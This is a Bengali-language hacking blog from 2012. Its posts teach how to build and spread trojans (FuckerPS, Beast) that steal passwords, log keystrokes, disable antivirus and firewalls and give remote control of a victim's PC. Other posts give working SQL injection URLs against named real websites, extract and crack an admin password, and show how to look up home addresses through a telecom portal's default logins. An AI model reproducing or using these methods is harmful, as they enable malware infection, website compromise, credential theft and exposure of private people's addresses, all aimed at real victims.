Wednesday, April 11, 2012

FuckerPS Trojan Hacking Tutorial

0 comments

*****বিসমিল্লাহির রাহমানির রাহিম*****

আসসালামু আলাইকুম, কেমন আছেন সবাই ? আশা করি মহান আল্লাহ তায়ালার অশেষ রহমতে সবাই ভাল আছেন । আমার আজকের টিউনে  সবাইকে স্বাগত । প্রায় ১ মাস আগে শুরু করেছিলাম ট্রোজান নিয়ে ধারাবাহিক টিউন। আজ ধারাবাহিক টিউনের ষষ্ঠ পর্ব। আর মাত্র কয়েক টি টিউন করব তারপর শেষ হয়ে যাবে । আজ আর কথা বাড়ালাম না। শুরু করা জাক আজকের টিউন।
অনেকের ধারণা হয়েছে আমি নাকি সফটওয়্যার সাথে ভাইরাস দেই। এইটা সম্পূর্ণ মিথ্যা । আমি নেট থেকে যেরকম ডাউনলোড করি ঠিক ওইরকম সফটওয়্যার টা মিডিয়াফায়ার-এ আপলোড করে আপনাদের দেই। অনেকের হয়ত সফটওয়্যার নিয়ে কোন problem হইছে তাই তারা এ কথাটা বলেছে। আজ আমি যে সফটওয়্যার টা নিয়ে লিখব, আশা করি এই সফটওয়্যার টা নিয়ে কারো কোন problem face করতে হবে না। আর আজকের টিউন টা অনেক ছোট এবং অনেক অনেক সহজ।

বিস্তারি টিউন লিখতে অনেক time লাগে। আর প্রতি পর্বে একই লেখা বার বার লেখতে ভালো লাগে না। তাই দয়া করে সবাই[যারা আগে টিউন গুলো পড়েন নাই] প্রথম পর্ব  থেকে পড়া শুরু করেন। তাহলে বিস্তারিত জানতে পারবেন।
আজকে যে Trojan নিয়ে লিখব তার নাম হল "FUCKER PS'  । অনেকটা LordPS-এর মত।

এটি নিয়ে কাজ করার আগে সবার প্রথমে আপনার পিসির এন্টিভাইরাস diasble করুন/ টোটালি অফ করুন। এন্টিভাইরাস টোটালি অফ করার কথা বলা হয়েছে এই কারনে, কারন এন্টিভাইরাস এটিকে ভাইরাস  সফটওয়্যার হিসাবে ধরবে  এবং আপনাকে কাজ করতে দিবেনা।

প্রথম সফটওয়্যার টি ডাউনলোড করে নিন

সফটওয়্যার টি ওপেন করার পর নিচের ছবির মত আসবে। এইটা হল কাঙ্ক্ষিত সফটওয়্যার। যেটা দিয়ে ভাইরাস Trojan virus বানানো হবে।

 1[www.freecall24.blogspot.com]  bangla hackign tutorial, hacking, tj mir, free call 24, free call, fucker ps
www.freecall24.blogspot.com
এখন সফটওয়্যার-এর বাম পাশের অপশন গুলো দেখেন। দেখলে আপনারা নিজেরাই বুজতে পারবেন এখন কি করতে হবে। যদি আগের পর্ব গুলো দেখে থাকেন তাহিলে আমার আর কিছু বলতে হবে না মনে হয়।
যাই তাও কয়েক টা অপশন সম্পর্কে লিখব। এখানে ৩৪ টা অপশন আছে। আপনি ভিকতিমের পিসি-তে কি কি তান্দব চালাবেন ওই ঘর গুলোতে টিক(mark) দিবেন।

2[www.freecall24.blogspot.com] bangla hackign tutorial, hacking, tj mir, free call 24, free call, fucker ps
TJ M!R HACKING TUTORIAL
১..উপরের ছবটা দেখেন।এগুলো  হল আপনি ভিকটিমের পিসি-থেকে কি কি তথ্য পেতে চান। এখন আপনি যা যা চান সে ঘর গুলোতে টিক দিন। আপনি যদি
""yahoo, Mns, phone number, OutLook, Intnet Explorer""" এর পাসওয়ার্ড চান তাহলে ওই ঘর গুলোতে টিক দিন।

2..এখন আপনি কিছু জিনিষ হাইড করে দিতে পারেন ভিকটিমের পিসি থেকে। যা হাইড করতে চান ওই ঘর গুলতে টিক দিন।

4[www.freecall24.blogspot.com]  bangla hackign tutorial, hacking, tj mir, free call 24, free call, fucker ps - Copy (2)
TJ M!R.
এখন "Disable kasper Spy & Disable Other Anti Virus" ঘর গুলোতে টিক দিন। তাহলে পরবর্তীতে ভিকটিমের অ্যান্টিভাইরাস কোন বাধা দিতে পারবে না। কারন তার অ্যান্টিভাইরাস disable হয়ে যাবে।
এখন আপনার ইচ্ছা মত বাকি ঘর গুলোতে টিক দিতে পারেন।

5[www.freecall24.blogspot.com]  bangla hackign tutorial, hacking, tj mir, free call 24, free call, fucker ps
TJ M!R
এখন "Sender"-এ আপনার মেইল গুলো লেখেন। এবং "Fake Error"-এ যেকোনো  বার্তা লেখেন। তারপর "Creat Server"-এ ক্লিক করে ভাইরাস ফাইলটি তৈরি করুন।
যে ফাইলটা  তৈরি হবে ওই ফাইলটা compressed করেন। তারপর ভিকটিম কে মেইল করে পাঠিয়ে দিন। ১ সাপ্তাহ পরে আপনি পেয়ে যাবেন সব তথ্য । "sender"এ যে মেইল অ্যাড্রেস গুলো দিছেন ওই মেইল গুলোতে নোটিফিকেশান আসবে। আগের পর্ব গুলো দেখেন। তা নাহলে কিছুই বুজবেন না
এই পর্বটা এখানেই শেষ ।
টিউনে কোন ভুল হলে আমাকে ধরিয়ে দিবেন। আর জানাবেন কি রকম টিউন আপনাদের পছন্দ । তাহলে পরবর্তীতে ভালো টিউন করতে পারব।
সবাই ভালো থাকবেন।

Thursday, April 5, 2012

what is SQL and how to hack a website [ part-2]

0 comments
SQL

SQL Inj3cti0n কি ?

সহজ ভাষায় বলতে গেলে SQL Inj3cti0n হলো এমন একটি code inj3cti0n কৌশল যা কোনো সাইটের ডাটাবেজের সিকিউরিটি কে ভেঙ্গে তা থেকে ইনফরমেশন বের করতে পারে।

যে কোনো সাইটে SQL Inj3cti0n করা যাবে ?

না। SQL Inj3cti0n তখনি কাজ করবে যখন কোনো সাইটে SQL error থাকবে।

কোনো সাইটে SQL error আছে কি নেই তা বুজবো কিভাবে ?

যেই সব সাইটে id=value থাকে ধরুন
http://www.site.com/news.php?id=5
সাধারণত এই সব সাইটে SQL error থাকে। কোনো সাইটে SQL error এভাবেই দেখাবে না, error দেখার জন্য আপনাকে url এর শেষে একটি '(string) দিতে হবে।
উদাহরণঃ http://www.bayviewhotelni.com/news.php?id=3 এটি হচ্ছে আসল লিঙ্ক, এই লিঙ্কে যখন আপনি ব্রাউজারে লোড করবেন তখন কোনো error আসবে না। যখন আপনি url এর শেষে একটি '(string) দিবেন তখন ঠিকই error আসবে।
http://www.bayviewhotelni.com/news.php?id=3'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''3''' at line 1
অথবা অনেক সময় দেখতে পারবেন যখন ' বসিয়েছেন তখন সাইটে যদি কোনো ছবি/ডাটা মিস করে তাহলে ও অই সাইটে SQL error আছে।
অর্থাৎ বোঝা গেলো এই সাইটে SQL error আছে। তাই আমরা এই সাইটটি কে SQL Inj3cti0n করেন হ্যাক করতে পারবো।

কিভাবে SQL inj3ction করবো কোনো সাইটকে ?

প্রথমে আমরা মজিলাতে একটি এডন ইন্সটল করবো যার নাম হচ্ছে HaCkBar. এই এডনটি ব্যবহার করলে কিছু কমান্ড দিতে সহজ হয়।
ডাউনলোড করে নিন এখান থেকে : https://addons.mozilla.org/en-us/firefox/addon/hackbar/
ইন্সটল করার পরেই দেখবেন আপনার ব্রাউজারে এডনটি দেখা যাচ্ছে।

সাইটের মোট কলাম নাম্বার বের করার নিয়ম :-

আপনি যখন SQL error কোনো সাইটকে SQL Inj3cti0n করতে যাবেন তখন আপনার প্রথম কাজ হবে সাইটের ডাটাবেজে মোট কয়টি কলাম আছে তা বের করা। আর বের করার পদ্ধতি হলো order by কমান্ড।
http://www.sparkleappealdorset.org/supporter.php?id=7 order by 1--
http://www.sparkleappealdorset.org/supporter.php?id=7 order by 2--
http://www.sparkleappealdorset.org/supporter.php?id=7 order by 3--
এভাবে যেতে থাকবেন যতক্ষণ পর্যন্ত কোনো Err0r না আসে।
http://www.sparkleappealdorset.org/supporter.php?id=7 order by 11--
দিলে কিছু লিখা অদৃশ্য হয়ে যায় অর্থাৎ এই সাইটটিতে মোট 10 টি কলাম আছে।

Vulnerable কলাম বের করার নিয়ম :-

এখন আমাদের দেখতে হবে এই সাইটের ১০ টি কলামের মধ্যে কতটি কলাম vulnerable. যেই সব কলাম vulnerable সেই সব কলাম থেকেই ডাটাবেজ এর ইনফরমেশন বের করা যাবে। আমরা Union Select কমান্ড ব্যবহার করে সাইটের vulnerable কলাম গুলা বের করবো।
প্রথমে union select তারপরে যে কইটি কলাম সে কলাম গুলা ঠিক এভাবে বসাতে হবে। আর id=value er আগে একটি - চিহ্ন বসাতে হবে যেমন- http://www.sparkleappealdorset.org/supporter.php?id=-7
http://www.sparkleappealdorset.org/supporter.php?id=-7+UNION+SELECT 1,2,3,4,5,6,7,8,9,10--

ডাটাবেজ ভার্শন বের করার নিয়ম:-

যে কোনো একটি vulnerable কলামে আমরা SQL কমান্ড বসাবো যাতে আমরা ডাটাবেজের ইনফরমেশন বের করতে পারি। কোনো সাইটের ডাটাবেজ এর ভার্শন যদি 4 হয় তাহলে তা ম্যানুয়ালি inj3ct করা যাবে না। তখন টুলস ব্যবহার করতে হবে like havij । আর যদি 5 হয় তাহলে আমরা ম্যানুয়ালি inj3ct করতে পারবো।
এই সাইটটিতে অনেক গুলা vulnerable কলাম আমাদের যে কোনো একটিকে বাছাই করে নিতে হবে।
ধরি আমরা ২ নাম্বার কলাম থেকে ডাটাবেজ ভার্শন বের করবো।
তাহলে syntax টি হবে
http://www.sparkleappealdorset.org/supporter.php?id=-7+UNION+SELECT 1,version(),3,4,5,6,7,8,9,10--
vulnerable কলামে version() রিপ্লেস করলেই ডাটাবেজের ভার্শন চলে আসবে।

ডাটাবেজ থেকে টেবিল বের করার নিয়ম :-

vulnerable কলামের জাগায় group_concat(table_name) এবং এক দম শেষ কলামের পরে from information_schema.tables where table_schema=database()--
তাহলে syntax টি দাড়ায়
http://www.sparkleappealdorset.org/supporter.php?id=-7+UNION+SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()--
যে টেবিল গুলো আমরা পেলাম তা হলো event,galleryImage,login_admin,supporter
এখানে এডমিন টেবিল হচ্ছে login_admin, এই টেবিল থেকে আমরা এডমিনের ইউসার এবং পাসওয়ার্ড বের করবো।

এডমিন টেবিল থেকে ইউজার এবং পাসওয়ার্ড বের করার নিয়ম :-

vulnerable কলামের জাগায় group_concat(column_name) এবং এক দম শেষ কলামের পরে from information_schema.columns where table_name=0xএডমিন টেবিল নামের হেক্স কোড--
তাহলে syntax টি দাড়ায়
http://www.sparkleappealdorset.org/supporter.php?id=-7+UNION+SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10 from information_schema.columns where table_name=0x6c6f67696e5f61646d696e--

এডমিন ইউসার এবং পাসওয়ার্ড বের করার নিয়ম :-

vulnerable কলামের জাগায় concat{যে কলাম গুলো পেয়েছেন সে গুলো(সব গুলো কলাম নয় সুধু মাত্র ইউসার এবং পাসওয়ার্ড এর কলাম)} এবং এক দম শেষ কলামের পরে কোন টেবিল থেকে এই কলাম পেয়েছেন সেই টেবিলের নাম।
http://www.sparkleappealdorset.org/supporter.php?id=-7+UNION+SELECT 1,concat(uid,0x3a,pwd),3,4,5,6,7,8,9,10 from login_admin--
বাস পেয়ে গেলেন সাইটের এডমিন পাসওয়ার্ড । এখন পুরো সাইটি আপনার হাতে যা খুশি তাই করুন। তবে মারাত্মক কোনো ক্ষতি না করাই ভালো। সহজেই হয়ে গেলেন একজন ওয়েব হ্যাকার :P

what is SQL and how to hack a website

0 comments

SQL injection কি ?

 হ্যাকিং করার অনেকগুলো পদ্ধতি আছে। আর এর মধ্যে সবচেয়ে যেটা বেশি জনপ্রিয় সেটা হল SQL. অনেকেই হয়ত জানেন না SQL এর পূর্ণরূপ। SQL এর পূর্ণরূপ হল Structured Query Language. এটা একটি হাই লেভেল ল্যাঙ্গুয়েজ। যেটা মানুষকে স্তব্দ করে দেয়। :) যেমনঃ- select, add data, delete data, update data এর জন্য যথাক্রমে SELECT,INSERT,DELETE,UPDATE কোয়ারিগুলো ব্যবহৃত হয় এখানে। সাধারণত SQL ডাটাবেজ ডিজাইনের জন্য ব্যবহৃত হয়। তথ্য সাধারণত ডাটাবেজে সেভ থাকে। আর SQL injection এর কাজ হল একটি ত্রুটিপূর্ণ এ্যাপ্লিকেশানের ডাটাবেজের ত্রুটি বের করে এখানে আক্রমণ করে ডাটাবেজ দেখা ও ডেটাবেজের সম্পূর্ণ নিয়ন্ত্রণ নিয়ে ফেলা। আর এই ধরনের ডেটাবেজের লিংক  দেখতে এমন হয়
www.anything.com/something.php?something=something
যেমনঃ-
www.tartanarmy.com/news/news.php?id=130.
এখানে ১৩০ হল, আমরা ডেটাবেজের ১৩০ পার করেছি। এখন আপনি এই লিংকের একদম শেষে একটি চিহ্ন যোগ করে এটার ত্রুটি বের করবেন। চিহ্নটি হল ( ‘ ) । যেমনঃ-
www.tartanarmy.com/news/news.php?id=130'
তাহলে একটি ইরর দেখাবে।

https://www.facebook.com/unselected
এবার একটু বেসিক জিনিস দেখেনঃ—–>
প্রত্যেক ডাটাবেজ সার্ভারের উপর ডাটাবেজ আছে। তাই না ?? আবার প্রত্যেক ডেটাবেজের টেবিলও রয়েছে। আবার প্রত্যেকটি টেবিলের রয়েছে বিভিন্ন কলাম। আর এই কলামগুলোতে থাকে ডাটা সংরক্ষিত।

https://www.facebook.com/unselected

https://www.facebook.com/unselected
উপরের ছবিতে দেখুন ডাটাবেজ আছে ৬টা আমরা “explore_hacking” ডাটাবেজটা সিলেক্ট করলাম। এটার দেখুন ৪টা টেবিল আছে admin, articles, products, subscribers. প্রতিটি টেবিলের রয়েছে আরও কলাম ও ডেটা। যেমনঃ- আমি ‘admin’ টেবিলটি সিলেক্ট করলাম। এখন দেখূন, এটা রয়ে id, username, password, email কলাম। আর এই সম্পর্কে আরও বিস্তারিত জানতে আমার phpmyadmin টিউটোরিয়াল ও PHP & MySQL টিউটোরিয়ালগুলো দেখূন। তাহলে আরও ভাল করে বুঝতে পারবেন।

information_schema কি ?

এটা হল information database. আর এটি SQL database severs(version>5) এ ডিফল্ট ভাবে থাকে। এখানে সব ধরনের তথ্য সংরক্ষিত থাকে। যেমনঃ- টেবিলের নাম, কলামসহ সব তথ্য।

https://www.facebook.com/unselected
এখন আমারা “information_schema” ডেটাবেজটি ওপেন করলাম। আর এই ডেটাবেজের টেবিলটির নাম হল ”TABLES”

https://www.facebook.com/unselected
————————————————————————————————————————————————————
এতক্ষণ পর্যন্ত যত বকবক করলাম এটা কিন্তু টিউটোরিয়ালে অংশবিশেষ। এক ঢিলে দুই পাখি মারার ব্যবস্থা করলাম আপনাদের জন্য। এবার আমরা যাবো, মূল টিউটোরিয়ালে। আপনি যাবেন ???? আসেন ঘুরে আসি, কি করা যায়। একদমই বিস্তারিত ভাবে শিখুন। একদমই সহজ পদ্ধতিতে।
————————————————————————————————————————————————————

-: SQL Injection টিউটোরিয়াল :-

প্রথমে এখানে লগইন করুন।
http://www.tartanarmy.com/news/news.php?id=130
শুধু url দিলেই হবে না। এখানের ভ্যালুয়ারেবল কলাম খুঁজে বের করতে হবে। একবার একটা টিউটোরিয়ার শুরু করেছিলাম SQL এর উপর। কিন্তু সেটার ৩ পর্ব লিখে থেকে গিয়ে ছিলাম। কারণ অনেক চিন্তা ভাবনা, সময়সহ আরও অনেক ঝামেলার কারণে সেটা আর করতে পারি নি। কিন্তু চিন্তা আছে সমানে দুটা একসাথে শুরু করবো। BackTrack ও SQL . সাথেই থাকবেন।

কলাম কিভাবে বের করবেনঃ-

এখানে আমারা “ORDER BY” clause ব্যবহার করবো। এটা ব্যবহার করা হয় যাতে sort the columns এর জন্য। এখন যে  কোন একটি নাম্বার সিলেক্ট করুন। যেমনঃ- 10. “–” এটি ব্যবহার করা হয়, কমেন্টের পরে কিছু করার জন্য।
এবার url টিতে যান
http://www.tartanarmy.com/news/news.php?id=130 order by 10--
উপরের লিংকটি কপি করে ব্রাউজারে পেষ্ট করুন। অথবা এখানে ক্লিক করুন Click here
মূলত এখানে আমরা ১০টি কলাম নির্দিষ্ট করলাম। যখনই আপনি এটা দিলেন, এটি সাথে সাথে একটি ইরর ম্যাসেজ দিলো, তার মানে এখানে কলাম ১০ টি থেকে কম আছে। এবার 10 এর পরিবর্তে 9 দিন।
http://www.tartanarmy.com/news/news.php?id=130 order by 9--
এখন এটি আবারও ইরর দিলো ! তার মানে এখানও এটা বুঝায় যে, কলাম ৯টির চেয়ে কম আছে। এবার আমরা একটু পন্ডিতি করে 9 এর জায়গায় 6 দিলাম।
http://www.tartanarmy.com/news/news.php?id=130 order by 6--
বাহ এটি ইরর দেয় নি। তার মানে আমরা পেয়ে গেছি। এটি যেহেতু কোন ইরর দেয় নি, তার মানে এটির ৬টি কলাম আছে।

vulnerable columns খুঁজে বের করাঃ-

একটু আগে আমরা যা করলাম তাহল, ডেটাবেজটিতে কয়টি কলাম আছে, তা বের করলাম। এখন আমরা বের করলাম কোন কলামটি vulnerable . এবার আমরা “UNION ALL” ও “SELECT” command ব্যবহার করে দেখবো।  130 এর সামনে একটি ড্যাস চিহ্ন (-) দিন।
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,2,3,4,5,6--.
অথবা এখানে ক্লিক করুন Click here
এখানে আমাদের একটি জোড় সংখ্যা পেত হবে। এখন এখানে দেখুন, যে সংখ্যাটি বোল্ড করা সেটি হল vulnerable columns. এখানে 2 নংটি হল vulnerable

https://www.facebook.com/unselected

database version খুঁজে বের করাঃ-

এবার “@@version” বা “verson()”  দিয়ে most vulnerable column টি রিপ্লেস করুন। তবে এখানে প্রথম কমান্ডটি কাজ না করলে পরেরটা হবে।
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,@@version,3,4,5,6--
অথবা এখানে ক্লিক করুন Click here
তাহলে আপনি আপনার স্ক্রীণে ভার্সন দেখতে পাবেন। ভার্সন পাবেন ৫.something. মানে ৫ থেকে বেশি পাবেন।  তবে কিছু কিছু ক্ষেত্র ৫ এর কম হয়, কারণ “information_schema” এ কোন ডেটাবেজ থাকে না।

https://www.facebook.com/unselected

table names খুঁজে বের করাঃ-

এবার “table_name” এ ভ্যালুয়ারেবল কলাম দিন।
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,table_name,3,4,5,6 from   information_schema.tables where table_schema=database()--
অথবা এখানে ক্লিক করুন Click here
আমরা একটি পেলাম

https://www.facebook.com/unselected
এবার সকল টেবিল পেতে ব্যবহার করুন group_concat
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(table_name),3,4,5,6 from information_schema.tables where                                             table_schema=database()--
অথবা এখানে ক্লিক করুন Click here

column names খুঁজে বের করাঃ-

এক রকম সকল টেবিল পেতে এটি ব্যবহার করুন ‘table’ with ‘column’
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()--
অথবা এখানে ক্লিক করুন Click here
আমরা এখন পরিবর্তনে ‘id’ পেলাম। এটা থেকে আমরা জানব যে, কোন টেবিলের কোন কলাম

https://www.facebook.com/unselected

কলাম থেকে ডাটা নিয়ে আসা

এখন আমরা যে কোন একটি কলাম থেকে ডাটা নিয়ে আসবো। কিন্তু যেটা সবচেয়ে মজার বিষয় সেটা হল username ও password.
এই কলামের প্রথম টেবিল হল tar_admin. এখন আমরা “0x3a” কমান্ডটি ব্যবহার করবো। এটা ব্যবহার করা হয়, যাতে রেজাল্টের একটা সাথে আরেকটা কোলন দিয়ে আলাদা আলাদ থাকে। এটাকে বলে hex of colon.
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(username,0x3a,password),3,4,5,6 from tar_admin--.
অথবা এখানে ক্লিক করুন Click Here

https://www.facebook.com/unselected
তাহলে আমরা ইউজার নেম ও পাসওয়ার্ড পেয়ে যাবো। কিন্তু পাসওয়ার্ড encrypted করা থাকে। বেশির ভাগ encryptions are crackable. এখন যে কোন একটি ইউজারনেম নেন। যেমনঃ- “Sneds”. পাসওয়ার্ড 7d372d3f4ad3116c9e455b20e946dd15 থেকে encrypted করতে হবে।
http://md5crack.com/crackmd5.php
উপরে লিংকে গিয়ে hashed(encrypted) password টি দিন ও ক্র্যাক করে নিন। এখন আমরা পাসওয়ার্ডটি একদমই সহজ ভাষায় পেলাম। আর সেটা হল ‘oorwullie’

ওয়েবসাইটের লগইন পেজ কোথায় পাবো ?

অনেক কষ্টে হ্যাস ক্র্যাক করে পাসওয়ার্ড বের করলাম সাথে ইউজারনেম জোগাড় করলাম। কিন্তু এখন এগুলো দিয়ে উক্ত সাইট ক্র্যাক করবো??? কোন সমস্যা নাই :)
বেশিরভাগ ওয়েবসাইটের লগইন পেজ ডিফল্ট ভাবে এক জায়গায় থাকে। এখন কিছু নমুনা দেখেনঃ——>
www.xyz.com ————————-> www.xyz.com/admin
www.xyz.com ————————-> www.xyz.com/administrator
www.xyz.com ————————-> www.xyz.com/adminlogin
এছাড়াও আপনি admin page finder নামের একটা টুলস ব্যবহার করতে পারেন।

Tuesday, April 3, 2012

Beast Trojan Hacking Tutorial..24

0 comments

*****বিসমিল্লাহির রাহমানির রাহিম*****

আসসালামু আলাইকুম, কেমন আছেন সবাই ? আশা করি মহান আল্লাহ তায়ালার অশেষ রহমতে সবাই ভাল আছেন । আমার আগের টিউন করে অনেক উৎসাহ পাইছি । পঞ্চম পর্ব ইতিমধ্যে প্রকাশিত হয়ে গেছে । আর এটা হল চতুর্থ পর্ব । এখন চতুর্থ পর্বের টিউন করতে বসলাম । এই পর্বে আবার আর একটা মারাত্মক Trojan ভাইরাস দিয়ে কিভাবে অন্যজনের পিসি হ্যাক করা যায় এবং কিভাবে এই ভাইরাসের আক্রমন থেকে বাচা যায় এই নিয়ে টিউন করবো। Trojan ভাইরাস নিয়ে টিউন শেষ টিউনের কথা ছিল। ভাবতেছি এই ধারাবাহিক টিউন শুধু ট্রাজোন নিয়েই করব। সম্ভাবত Trojan নিয়ে ১০ পর্বের টিউন করা হতে পারে। Trojan নিয়ে শেষ পর্বটা হবে কিভাবে খুব সহজে ভিকটিম কে ধোঁকা দিয়ে তার পিসি-তে ভাইরাস রান করা জায় এবং কিভাবে এই ভাইরাসের হাত থেকে সম্পূর্ণ ভাবে রক্ষা পাওয়া যায়। বেশি কথা না বলে কাজ শুরু করি। কথা কম কাজ বেশি।


আজকে যে Trojan নিয়ে লিখব তার নাম হল "beast"

এটি নিয়ে কাজ করার আগে সবার প্রথমে আপনার পিসির এন্টিভাইরাস diasble করুন/ টোটালি অফ করুন। এন্টিভাইরাস টোটালি অফ করার কথা বলা হয়েছে এই কারনে, কারন এন্টিভাইরাস এটিকে ভাইরাস সফটওয়্যার হিসাবে ধরবে এবং আপনাকে কাজ করতে দিবেনা।

প্রথম সফটওয়্যার টি ডাউনলোড করে নিন



সফটওয়্যার টি ওপেন করার পর নিচের ছবির মত আসবে। এইটা হল কাঙ্ক্ষিত সফটওয়্যার। যেটা দিয়ে ভাইরাস Trojan virus বানানো হবে।

***বিঃদ্রঃ-দয়াকরে এই ট্রাজোন-এর কেউ অপব্যাবহার করবেন না। আর কেউ ক্ষতিগ্রশ্ত হলে আমি(মীর) অথবা tunerpage দায়ী থাকবেনা।


এখন চলুন শুরু করা যাক কিভাবে Trojan বানাবেন। "Build Server"-এ ক্লিক করুন। আর statistics টা ক্লোজ করে দেন।


Server Settings

"Basic" 1





basicএ ক্লিক করে, Name-এ আপনার ইচ্ছা মত যেকোনো নাম দিতে পারেন। এবং ভাল মানের একটি পাসওয়ার্ড দিন। এ ২টা জিনিস মনে রাখতে হবে। পরে কাজে লাগবে। এখন basic এর কাজ শেষ।

"Notifications"2



"SIN"-এ ক্লিক করুন। তারপর Get IPতে ক্লিক করন। এবং Connection Time-out-এ ২০, ৩০, ৫০, ২০০ ইচ্ছা মত সেকেন্ড দিতে পারেন। এইটা হল কত সেকেন্ড পর connection বিচ্ছিন্ন হবে।



"E-Mail" আপনার মেইল address লিখুন। আপনি যে মেইল-এ notification পেতে চান ওই mail address লিখুন।

ICQ & CGI সম্পর্কে যদি না জানেন তাহলে ওগুলো পরিবরতন করার প্রয়োজন নাই।

"StartUp"3



সব গুলো ঘরে টিক দিন। [যদি ডিফল্ট ভাবে টিক না দেওয়া থাকে ]

"AV-FW Kill"4



এখন "Kill AV -FW On Start" & "Disable XP FireWall" ঘরে টিক দিন । এই ধাপের কাজ শেষ ।


"Misc."5

TJ Mir Hacking tutorial

এখন প্রথম ৪ টা ঘরে টিক দিন।[উপরের ছবি দেখুন]

এগুলো হল (১)ভিকটিম-এর পিসি-টে melt server install, (২)KeyLogger সেটআপ করা , (৩) Restore point রিমুভ করে দেওয়া। যাতে ভিকটিম তার পিসি restore করতে পারবে না। (৪)একটু পর পর ফেক ইরর বার্তা শোও করা। এখন আপনি ইচ্চা করলে বাকি গুলোও মার্ক করতে পারেন।

"Exe Icon"6

এখন যেকোনো একটা আইকন সিলেক্ট করেন। এক্ষেত্রে একটু চালাকি করতে হয়। যেমন আপনি একটি ভাল আইকন দিতে পারেন। যাতে ভিকটিক খুব আগ্রহের সাথে ফাইলটি-তে ক্লিক করে। অথবা আপনি আপনার পিসি থেকেও সুন্দর যেকোনো আইকন দিতে পারেন। এখন সব কাজ শেষ এখন শুধু ফাইলটা বানানোর পালা।

"Save Server"এ ক্লিক করলে ভাইরাস ফাইল তৈরী হবে।



এখন Beast software টি যে ফোল্ডার(location) থেকে রান করেছেন ওইখানে দেখুন ফাইলটি সেভ হয়েছে।

এখন server নামের ফাইল টা rename করেন । এবং এমন একটা নাম দেন জেন ভিকটিম সহজে ক্লিক করে।

এখন ফাইলটা কে compressed করেন এবং মেইল করে পাঠিয়ে দিন আপনার শত্রুকে। আমার আগের টিউন গুলো দেখেন, তাহলে আপনাদের কাছে ব্যাপারটা আড়োও সহজ লাগবে। আমি আপনাদের কিছু ইমেইল অ্যাড্রেস দিমাল এখানে

এখন ভিকটিম যদি আপনার বানান ফাইল-এ ক্লিক করে তাহলে আপনার মেইল অ্যাকাউন্ট-এ message আসবে, যে কেউ আপনার ফাইল-এ ক্লিক করেছে।

এখন আসুন কিভাবে আক্রমন চালাবেন??

এখন host-এ IP address টি লিখুন। এবং আপনার পাসওয়ার্ড টি লিখে Go BEAST!-এ ক্লিক করে connect করুন। ("Notifications"2-এ যে ip ছিল ওইটা)


connect হয়ার পর সফটওয়্যার-এর দান পাশের অপশন গুলো দ্বারা ভিকটিম-এর পিসি নিয়ন্ত্র করতে পারবেন।

অনেক গুলো অপশন থেকে আমি মাত্র কয়েকটা নিয়ে লিখব আর বাকি গুল আশা করি আপনারা নিজেরাই বুজতে পারবেন। অথবা ৫ম পর্ব টিনের নিচে দেখুন।


"Manager"

এখানে অনেক গুলো অপশন আছে।
এখান থেকে আপনি ভিকটিম আর webcam,Screen, Apps, File ect দেখতে পারবেন।


"Windows"

এখানেও অনেক গুলো অপশন আছে।
এখান থেকে আপনি ভিকটিম-এর সব কিছু হাইড, crash,shut down, restart, log off করতে পারবেন।


"lamer Stuff"

অনেকে আছে জারা লেমান মানে জানেন না। লেমার মানে হল ক্ষোরা বা পঙ্গু লোক।



এখানেও অনেক গুলো অপশন আছে।
এখান থেকে আপনি ভিকটিম-এর মাউস হাইড, সিডি রম লক, ওয়ালপেপার পরিবর্তন এবং চ্যাট করতে পারবেন।

"Misc"

নিচের ছবি টা দেখেন তাহলে সব বুজতে পারবেন ।




আশা করি এখন BEAST সম্পর্কে আপনাদের মটামটি ধারনা হয়েছে আর কিভাবে এটা দিয়ে attack করতে হয় টা জানতে পারেছেন। অপরিচিত কেউ আপনাকে mail করে কোন ফাইল পাঠালে ডাউনলোড করার পর ওপেন করার আগে অবশ্যই স্ক্যান করে নিবেন

অনেক সময় নিয়ে গুছিয়ে টিউন করেছি। জানি না আপনাদের কেমন লেগেছে।আর টিউন এ কোন ভুল হলে ধরিয়ে দিবেন। তাহলে পরবর্তীতে আড়ও ভাল টিউন করতে পারব। সবাই ভাল থাকবেন।

tunerpage-এ শুরু হয়েছে "কে হবে ২০১২-এর শেরা TJ" আশা করি সবাই টিউন করার চেষ্টা করবেন। আর টিউন করতে না পারলে কমেন্ট করতে পারেন। কমেন্ট করলে-ও prize আছে।

সবাই টিউনারপেজের সঙ্গে থাকুন।

Saturday, March 31, 2012

find any house address by T&T mobile number

0 comments

 যেকোনো বাসার এড্রেস বের করুন tnt নম্বর থেকে.....খুব সহজে

প্রথম এখানে যান............http://203.112.222.42/
তারপর loginএ ক্লিক করুন।
আপনি যে নম্বরের এড্রেস বের করতে চান এরিয়া কোডসহ সেই নম্বরটি usernameএ বসান। পাসওয়ার্ডও সেই নম্বরটিই ( এরিয়া কোডসহ )।
যেমন আপনি  0284754xx এই নম্বরের এড্রেস বের করতে চাই। তাই এটাকেই ইউজারনেম এবং পাসওয়ার্ড হিসেবে ব্যাবহার করুন।
এরপর Login এ ক্লিক করে login করুন।
তারপর PRINT/VIEW CUSTOMER BILL এ ক্লিক করুন।
তারপর VIEW PAYMENT STATUS এ ক্লিক করুন।
তারপর  কোন মাস থেকে কোন মাশ আর details দেখতে চান তা লিখে submit করুন।  তাহলে সব তথ্য পেয়ে জাবেন।

বিঃদ্রঃ অন্য কেউ যাতে আপনার এড্রেস না পায় তার জন্য পাসওয়ার্ডটি চেঞ্জ করে ফেলুন । যারা পাসওয়ার্ড চেঞ্জ করে ফেলবে, এই পদ্ধতিতে তাদের এড্রেস বের করা যাবে না।

hack citycell mobile pin code

0 comments

সিটিসেল ফোনের পিন কোড হ্যাক করুন।

